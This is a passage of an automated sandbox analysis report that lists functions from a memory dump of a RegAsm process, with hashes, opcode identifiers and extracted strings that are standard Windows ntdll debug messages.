                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ce064c90a7ddc78f7f733e83e815bdc93ad7e614955ea6d04e566ae55ef01d9
                • Instruction ID: abf0cb336d5d8b72d31b9aa0f695b86d74ff8a83df2181039f03258d49ce3ecc
                • Opcode Fuzzy Hash: 5ce064c90a7ddc78f7f733e83e815bdc93ad7e614955ea6d04e566ae55ef01d9
                • Instruction Fuzzy Hash: C990022130140412D102715888146070409C7D13C5F95C013E2424555D8AA58A53A132
                Function 02F32FE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a3d66498fd973cc1bfa3239cabb95483c4111b948a22f27324ca14f11fd2512
                • Instruction ID: ceb68169d6a23b087524c17b6018bcc92e53ec1bcc2f98f64fc512e440fe8d8a
                • Opcode Fuzzy Hash: 8a3d66498fd973cc1bfa3239cabb95483c4111b948a22f27324ca14f11fd2512
                • Instruction Fuzzy Hash: 5F900221211C0052D20075688C14B07040587D0383F55C116A1154554CCD9589615521
                Function 02F32FB0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7cf98e03617e74fdd46516c6f8015c2bbd0a5b3742b8f38dc0a8a64202ef899
                • Instruction ID: b186281fc0b70b260c49f9e57b78198ca390040de1dbd26af86613ddcf2360e7
                • Opcode Fuzzy Hash: c7cf98e03617e74fdd46516c6f8015c2bbd0a5b3742b8f38dc0a8a64202ef899
                • Instruction Fuzzy Hash: 879002216014005241407168CC449074405ABE1291755C122A1998550D89D989655665
                Function 02F32FA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f2dd9ca57475115428cdd18285fd270b97c08620cfa65d952e444bd6e03d444
                • Instruction ID: 9bfdafb2157432ff25f81c099e164e9950508b14affa93a3d56c667242334e37
                • Opcode Fuzzy Hash: 2f2dd9ca57475115428cdd18285fd270b97c08620cfa65d952e444bd6e03d444
                • Instruction Fuzzy Hash: B190023120180412D10071588C08747040587D0382F55C012A6164555E8AE5C9916531
                Function 02F32F90 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bcbfd67235a6e3aabe88ea837b3c99fde81d2e38ead6f1c0f9d20850d2ea0722
                • Instruction ID: 453d7e2ed0eb99e4dbebb7f56ecdf0be71243e99841782038c03feb7943caf99
                • Opcode Fuzzy Hash: bcbfd67235a6e3aabe88ea837b3c99fde81d2e38ead6f1c0f9d20850d2ea0722
                • Instruction Fuzzy Hash: ED90023120180412D10071588C1470B040587D0382F55C012A2164555D8AA589516571
                Function 02F32F60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82695d4413974dab84c91995204061aac4f69298b8c6edbfbb8f12f2c9782999
                • Instruction ID: ea94990f6c83ac2a4cfd10474157da4c3f54a7656b028e5217416b078fa82412
                • Opcode Fuzzy Hash: 82695d4413974dab84c91995204061aac4f69298b8c6edbfbb8f12f2c9782999
                • Instruction Fuzzy Hash: B890026121140052D10471588804707044587E1281F55C013A3154554CC9A98D615125
                Function 02F32F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3add139a413924ceb687d79dfb40830166f300993b7b86f94fb6e774969cd8b
                • Instruction ID: fd817ca8636015d1816b4e781a76cac9811b5e9912ac8073e201ea752bbb1651
                • Opcode Fuzzy Hash: d3add139a413924ceb687d79dfb40830166f300993b7b86f94fb6e774969cd8b
                • Instruction Fuzzy Hash: 5C90026134140452D10071588814B070405C7E1381F55C016E2064554D8A99CD526126
                Function 02F32CF0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba3d2e3c11c8f6cdd39466e0d20974d198efb815ecd16d63117f3fb2d9f73364
                • Instruction ID: d265c5af6452b4ede1931d980ceeddc085971f69d757986c6537db4c3363ba71
                • Opcode Fuzzy Hash: ba3d2e3c11c8f6cdd39466e0d20974d198efb815ecd16d63117f3fb2d9f73364
                • Instruction Fuzzy Hash: DA90023120140413D10071589908707040587D0281F55D412A1424558DDAD689516121
                Function 02F32CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6989f23be8ef88570c611df27b2b7034bfedea0dddce1ae5682c42c968983878
                • Instruction ID: e9ddf92bfe0a474808647a4697680e464da46f32efb435fabc9b7b68a5d152d5
                • Opcode Fuzzy Hash: 6989f23be8ef88570c611df27b2b7034bfedea0dddce1ae5682c42c968983878
                • Instruction Fuzzy Hash: 7290022160540412D14071589818707041587D0281F55D012A1024554DCAD98B5566A1
                Function 02F32CA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cd4980acdfcc824f964693b78e0092d9e6e2b83f3397e668d4e936ed46fa99d8
                • Instruction ID: 26ee89dfc8e344ce2982d299465784d0e84ccc843c8f0e461ae8ef0bbec3ddf8
                • Opcode Fuzzy Hash: cd4980acdfcc824f964693b78e0092d9e6e2b83f3397e668d4e936ed46fa99d8
                • Instruction Fuzzy Hash: 8090023120140412D10075989808647040587E0381F55D012A6024555ECAE589916131
                Function 02F32C60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b74754ba484d38ee02a87d9c2f3c918d56106b52677edce1134afb362c795736
                • Instruction ID: 70d0834a19952f8581a69198fc8c22636adfccd3ff6fefeff37661982a8a7f97
                • Opcode Fuzzy Hash: b74754ba484d38ee02a87d9c2f3c918d56106b52677edce1134afb362c795736
                • Instruction Fuzzy Hash: A590023120140852D10071588804B47040587E0381F55C017A1124654D8A95C9517521
                Function 02F32DD0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0dafb19ac8b3c8901eb939875eb7e0d028e398d35f705911ae62089f6057273a
                • Instruction ID: aad40300a59136c405ed95299b401ffc61c106a92d69133a01f304936326668a
                • Opcode Fuzzy Hash: 0dafb19ac8b3c8901eb939875eb7e0d028e398d35f705911ae62089f6057273a
                • Instruction Fuzzy Hash: 85900221242441625545B1588804507440697E02C1795C013A2414950C89A69956D621
                Function 02F32DB0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c1d6a7abf3a4b1b81dcc07213c6af5c66287c2efd7881d61c9b4499d6f47dd3
                • Instruction ID: 4dd5fd7746a487f4d6d79748505e89184e69ab145cc0484c3868c827724bdd83
                • Opcode Fuzzy Hash: 0c1d6a7abf3a4b1b81dcc07213c6af5c66287c2efd7881d61c9b4499d6f47dd3
                • Instruction Fuzzy Hash: 5D90023124140412D14171588804607040997D02C1F95C013A1424554E8AD58B56AA61
                Function 02F33D70 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43b531aaba4da7020fc560f0c1098bcb2cb4606d6091eabb98c89c9852c6beb4
                • Instruction ID: bd95d9fa56194234f0db4f8481b02336c892a7a0833daf646a231a258b1259a8
                • Opcode Fuzzy Hash: 43b531aaba4da7020fc560f0c1098bcb2cb4606d6091eabb98c89c9852c6beb4
                • Instruction Fuzzy Hash: 5390023520140412D51071589C04647044687D0381F55D412A1424558D8AD489A1A121
                Function 02F32D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5038343630958ec04929b5abe0b83452136c2c129e2b8869dee6c604febe8e41
                • Instruction ID: fbd43ce32fc08d9ae60933a693a158218460ed5b294fa0e8a0c75da110c3f13c
                • Opcode Fuzzy Hash: 5038343630958ec04929b5abe0b83452136c2c129e2b8869dee6c604febe8e41
                • Instruction Fuzzy Hash: AF90022130140013D140715898186074405D7E1381F55D012E1414554CDD9589565222
                Function 02F32D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7488900900f8c9a315e9d6007b48a26e1120ae5546598cc647e4edc4b10ab4ba
                • Instruction ID: 6798b71aa4e42a4348fbe89ae9f2ca6dd1a43b28fd90f07180903624a74c5f3a
                • Opcode Fuzzy Hash: 7488900900f8c9a315e9d6007b48a26e1120ae5546598cc647e4edc4b10ab4ba
                • Instruction Fuzzy Hash: F290022921340012D1807158980860B040587D1282F95D416A1015558CCD9589695321
                Function 02F33D10 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d98f3035d9d606f0f75abc0ec1315ce1e03781b04030c3c65c9dfd3403c60f6
                • Instruction ID: f24858cdb672e400cdf182bb5f2ac85aecf8246de1d1a7f48a2d1dbce5a2b5b7
                • Opcode Fuzzy Hash: 1d98f3035d9d606f0f75abc0ec1315ce1e03781b04030c3c65c9dfd3403c60f6
                • Instruction Fuzzy Hash: 1A90023120240152954072589C04A4F450587E1382B95D416A1015554CCD9489615221
                Function 02F32D00 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eb48839d5fba373246ee55fd1f8f89b96ef72aefe13a2ad1bc2fe55bd2f1da8c
                • Instruction ID: 1bcc76452311fabd4028fb150bf0f3a2105c69e6b59937025175aa4f48740eef
                • Opcode Fuzzy Hash: eb48839d5fba373246ee55fd1f8f89b96ef72aefe13a2ad1bc2fe55bd2f1da8c
                • Instruction Fuzzy Hash: 9990022120544452D10075589808A07040587D0285F55D012A2064595DCAB58951A131
                Function 02F32C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction ID: 626c92114d9441206ed71d4528e61b8dc8aaaf3228f80ec91f671350a9221983
                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction Fuzzy Hash:
                Function 02F32890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 028dd8a956c30bf5720b0e5b9744fae838378b3dcb2c4b3a14b98ed558b6f154
                • Instruction ID: fac82c39e0ef548e5b93bf372a92427a8d734c788cb37c141f7a4e8aa076b549
                • Opcode Fuzzy Hash: 028dd8a956c30bf5720b0e5b9744fae838378b3dcb2c4b3a14b98ed558b6f154
                • Instruction Fuzzy Hash: 9851E7B6E00116BFDB11DF98889097EF7B8FB08780750C16AEA65D7641D774EE40DBA0
                Function 02F27630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                Download Yara Rule
                Strings
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F64787
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F64655
                • Execute=1, xrefs: 02F64713
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F64725
                • ExecuteOptions, xrefs: 02F646A0
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F64742
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F646FC
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 13007b5b34219f50e8da5928fad372e61d01046951b1f1b37dbf9aa4cc0d29b4
                • Instruction ID: 27333099e15039b07b0fa69e45249233b2e7cc4a56dd750c3c070fcb918a1bd5
                • Opcode Fuzzy Hash: 13007b5b34219f50e8da5928fad372e61d01046951b1f1b37dbf9aa4cc0d29b4
                • Instruction Fuzzy Hash: D2510931A4022DAAEF21FAA4DC89FBDB7B9EF05384F1401A9D705AB190D7719E49CF50
                Function 02F3B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 5b3c3ea9abb6a021a0174248b50e6e34b8210967766fd3f8fdff2815eb1e06c0
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: 7881A270E052499EDF26CF68C871BFEBBB2EF4539CF18425ADA51A7291C7349841CB50
                Function 02F1F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                Download Yara Rule
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F602BD
                • RTL: Re-Waiting, xrefs: 02F6031E
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F602E7
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 68aadba3518dc0987d3b7f8215a71d9211eee782c6ca1554e6cddf231e70934c
                • Instruction ID: 6b4698b9e8b2a8d4a30b81643ad630270149a5bc673abde5b5ea3a5f721ba70a
                • Opcode Fuzzy Hash: 68aadba3518dc0987d3b7f8215a71d9211eee782c6ca1554e6cddf231e70934c
                • Instruction Fuzzy Hash: 5EE1CE31A087419FD725CF28C884B2AB7E1FF843A8F640A5DE6958B6E1DB74D845CB42
                Function 02F2BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                Download Yara Rule
                Strings
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F67B7F
                • RTL: Resource at %p, xrefs: 02F67B8E
                • RTL: Re-Waiting, xrefs: 02F67BAC
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: a63764ac3529acac66521a0a060beb1514b9dedb76d76141c8439e33a5a494b6
                • Instruction ID: bf60829470c3097b12bdc031cf98f0bfb641b439dc1914b0060bfce7db8021d2
                • Opcode Fuzzy Hash: a63764ac3529acac66521a0a060beb1514b9dedb76d76141c8439e33a5a494b6
                • Instruction Fuzzy Hash: AE41D2317047029FD720DE25CD40B6AB7E5EF897A8F100A1DEA5ADB680DB71E809CF91
                Function 02F2B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F6728C
                Strings
                • RTL: Resource at %p, xrefs: 02F672A3
                • RTL: Re-Waiting, xrefs: 02F672C1
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F67294
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: 834b395e1276cb405e9e5944c4d5b9965c121403584102b333b8481e520d4c7f
                • Instruction ID: 727ce03bb7bcf7f9996344a0a823a09bdd37cecc52afbe8c62af1216a2529bc4
                • Opcode Fuzzy Hash: 834b395e1276cb405e9e5944c4d5b9965c121403584102b333b8481e520d4c7f
                • Instruction Fuzzy Hash: EC41F032B00212ABD720EE25CD81B6AB7A5FF55798F100619FE55AB280DB20F846CFD0
                Function 02F37D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: f72d163954bcad817299eb69bdc7eabe2f74ac9144ce2ba24f3443228ba8cb72
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 739196F1E002169BDB26EE69C8807BEF7E5BF447E4F14461AEA65E72C0D7349980CB50
                Function 02EF9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: 5e753abcf14787d840a80d721884486e2b4dc33b78a20361bd76df189f952cde
                • Instruction ID: da5c7c491eb3269fdb20e18fc5c81fd3a7220c995e49382221fddb205e913ccb
                • Opcode Fuzzy Hash: 5e753abcf14787d840a80d721884486e2b4dc33b78a20361bd76df189f952cde
                • Instruction Fuzzy Hash: 12811B71D40269DBDB35CF54CC44BEAB7B8AB08754F0041EAAE59B7280D7709E84CFA0